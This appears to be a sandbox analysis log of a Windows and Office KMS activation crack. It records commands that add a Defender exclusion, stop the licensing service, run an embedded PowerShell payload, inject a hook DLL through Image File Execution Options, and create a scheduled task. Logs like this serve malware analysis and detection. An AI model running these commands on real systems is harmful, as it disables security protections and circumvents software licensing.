C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop3⤵
- System Location Discovery: System Language Discovery
PID:4456
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop4⤵PID:2436
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver3⤵
- System Location Discovery: System Language Discovery
PID:1052
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4356
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR4⤵PID:1668
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:4104
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:4664
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:2792
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:4516
C:\Windows\system32\reg.exereg query "HKCU\Console" /v ForceV23⤵PID:4852
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:4644
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\skus3⤵
- System Location Discovery: System Language Discovery
PID:2180
C:\Windows\system32\sc.exesc query osppsvc3⤵
- Launches sc.exe
PID:2004
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\addons 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2256
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"3⤵PID:4564
C:\Windows\system32\mode.commode con cols=80 lines=343⤵PID:4412
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:4372
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:384
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:1668
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:4356
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:5076
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:4360
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:3716
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:4728
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:1900
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:2180
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:2756
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:2004
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:3368
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1712
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:4456
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:2436
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:4888
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1236
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:4936
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:4852
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1900
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:4304
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:3988
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:312
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:112
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:3740
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:2004
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:4132
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:2180
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %B in (1) do rem"3⤵
- System Location Discovery: System Language Discovery
PID:2936
C:\Windows\system32\mode.commode con cols=100 lines=343⤵PID:1668
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5008
C:\Windows\system32\Wbem\WMIC.exeWMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\Sysnative\SppExtComObjHook.dll" Force=True3⤵PID:2888
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:388
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:1852
C:\Windows\system32\net.exenet stop sppsvc /y3⤵PID:4360
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sppsvc /y4⤵PID:560
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:4664
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:5108
C:\Windows\system32\sc.exesc stop sppsvc3⤵
- Launches sc.exe
PID:4644
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$d='C:\Windows\System32';$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[1]);X 2"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4832
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Temp\culypuzr\culypuzr.cmdline"4⤵PID:5204
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\Temp\RES2083.tmp" "c:\Windows\Temp\culypuzr\CSCA81D62C3387A4CFB8E8112ED8A46FF4.TMP"5⤵PID:5288
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v Debugger3⤵PID:5380
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierDlls /t REG_SZ /d "SppExtComObjHook.dll"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5396
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierDebug /t REG_DWORD /d 0x000000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5412
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierFlags /t REG_DWORD /d 0x800000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5424
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v GlobalFlag /t REG_DWORD /d 0x000001003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5440
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_Emulation /t REG_DWORD /d 13⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5456
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5472
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5488
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_HWID /t REG_QWORD /d "0x3A1C049600B60076"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5500
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v Debugger3⤵PID:5548
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierDlls /t REG_SZ /d "SppExtComObjHook.dll"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5580
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierDebug /t REG_DWORD /d 0x000000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5596
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierFlags /t REG_DWORD /d 0x800000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5612
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v GlobalFlag /t REG_DWORD /d 0x000001003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5640
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_Emulation /t REG_DWORD /d 13⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5656
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5676
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5688
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:5700
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon"3⤵PID:5744
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:5768
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':spptask\:.*'; [IO.File]::WriteAllText('SvcTrigger.xml',$f[1].Trim(),[System.Text.Encoding]::Unicode)"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5792
C:\Windows\system32\schtasks.exeschtasks /create /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger" /xml "C:\Windows\Temp\SvcTrigger.xml" /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:5952
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:5980
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6024
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\Software Protection Platform" /v NoGenTicket /t REG_DWORD /d 1 /f3⤵PID:5160
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:5148
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:5200
C:\Windows\system32\net.exenet stop sppsvc /y3⤵PID:3076
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sppsvc /y4⤵PID:5224
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:3976
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:2760
C:\Windows\system32\sc.exesc stop sppsvc3⤵
- Launches sc.exe
PID:1076
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2612
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1304
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_HWID /t REG_QWORD /d "0x3A1C049600B60076"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3368
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3452
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3880
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:388
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:2372
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k 2>nul | FIND /I "CurrentVersion"3⤵
- System Location Discovery: System Language Discovery
PID:2108
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k4⤵PID:5036
C:\Windows\system32\find.exeFIND /I "CurrentVersion"4⤵PID:2812
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.1288" /v "CurrentState"3⤵PID:5296
C:\Windows\system32\find.exeFIND /I "0x70"3⤵PID:5316
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ECHO Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.12883⤵
- System Location Discovery: System Language Discovery
PID:4452
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.264" /v "CurrentState"3⤵PID:4284
C:\Windows\system32\find.exeFIND /I "0x70"3⤵PID:1808
C:\Windows\system32\net.exenet start sppsvc /y3⤵PID:4040
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start sppsvc /y4⤵PID:4508
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL" get LicenseFamily /value 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4712
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL" get LicenseFamily /value4⤵PID:4460
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5348
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName4⤵PID:4360
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath3⤵
- Modifies registry key
PID:4808
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4644
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:5188
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:5392
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath3⤵
- Modifies registry key
PID:5380
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\CVH /f Click2run /k3⤵
- Modifies registry key
PID:5396
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5428
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5424
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5440
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5456
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5480
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5496
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5500
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5564
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5588
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5604
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5576
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5624
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- System Location Discovery: System Language Discovery
PID:5644
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:5660
C:\Windows\system32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5676
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlusVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2924
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5704
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3060
C:\Windows\system32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5748
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5632
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5772
C:\Windows\system32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:664
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5876
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5892
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5908
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5836
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5816
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5840
C:\Windows\system32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5848
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5856
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5808
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5800
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5964
C:\Windows\system32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6072
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlusRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6104
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6020
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6012
C:\Windows\system32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6048
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6044
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6136
C:\Windows\system32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5164
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5200
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:396
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1668
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2760
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1076
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3744
C:\Windows\system32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1940
C:\Windows\system32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2004
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4888
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5248
C:\Windows\system32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5280
C:\Windows\system32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:112
C:\Windows\system32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2108
C:\Windows\system32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5308
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:876
C:\Windows\system32\findstr.exefindstr 20193⤵PID:3804
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:5076
C:\Windows\system32\findstr.exefindstr 20213⤵PID:4284
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4392
C:\Windows\system32\findstr.exefindstr 20243⤵PID:3188
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"3⤵PID:4860
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%'" get Name /value3⤵PID:4344
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:5380
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%'" get Name /value3⤵PID:5448
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5468
C:\Windows\system32\find.exefind /i "Office 14"3⤵PID:5464
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5496
C:\Windows\system32\find.exefind /i "Office 15"3⤵PID:5472
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5548
C:\Windows\system32\find.exefind /i "Office 16"3⤵PID:5568
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5544
C:\Windows\system32\find.exefind /i "Office 19"3⤵PID:5596
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5588
C:\Windows\system32\find.exefind /i "Office 21"3⤵PID:5612
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5576
C:\Windows\system32\find.exefind /i "Office 24"3⤵PID:5672
C:\Windows\system32\find.exefind /i "Office16ProPlusR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5648
C:\Windows\system32\find.exefind /i "Office16StandardR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5676
C:\Windows\system32\find.exefind /i "Office16AccessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2924
